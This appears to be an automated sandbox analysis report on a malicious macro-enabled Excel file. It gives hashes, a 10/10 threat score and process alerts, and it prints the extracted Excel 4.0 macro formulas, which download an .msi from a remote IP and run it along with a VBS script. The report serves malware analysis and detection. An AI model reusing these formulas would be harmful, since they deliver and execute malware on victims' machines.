General
-
Target
0454c6a4b3529de10f718ac63472b620
-
Size
6KB
-
Sample
231221-zggelsdbcp
-
MD5
0454c6a4b3529de10f718ac63472b620
-
SHA1
930f804cb102043bf923ce34a1aca7565639e4dd
-
SHA256
c8b5f090fca28bef28a607e307b4a703aaba5cdc3dae9a63752849710c20a75e
-
SHA512
ed1a40478c6f2a1600adeaf65d39540a21f60979c1ab1cdb57ccbd6b4c2d75a87e7a3cf51522355b86f6210a2efb1bd28f209cd2afd137be6394461f7b1b6a62
-
SSDEEP
192:NDSpuSl1aEOmmfR28UhHFBFYuQb98y+Mts:NOu8wI1FY9b98y+ms
Static task
static1
Behavioral task
behavioral1
Sample
0454c6a4b3529de10f718ac63472b620.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0454c6a4b3529de10f718ac63472b620.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()
Extracted
http://46.17.98.187
Targets
-
-
Target
0454c6a4b3529de10f718ac63472b620
-
Size
6KB
-
MD5
0454c6a4b3529de10f718ac63472b620
-
SHA1
930f804cb102043bf923ce34a1aca7565639e4dd
-
SHA256
c8b5f090fca28bef28a607e307b4a703aaba5cdc3dae9a63752849710c20a75e
-
SHA512
ed1a40478c6f2a1600adeaf65d39540a21f60979c1ab1cdb57ccbd6b4c2d75a87e7a3cf51522355b86f6210a2efb1bd28f209cd2afd137be6394461f7b1b6a62
-
SSDEEP
192:NDSpuSl1aEOmmfR28UhHFBFYuQb98y+Mts:NOu8wI1FY9b98y+ms
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-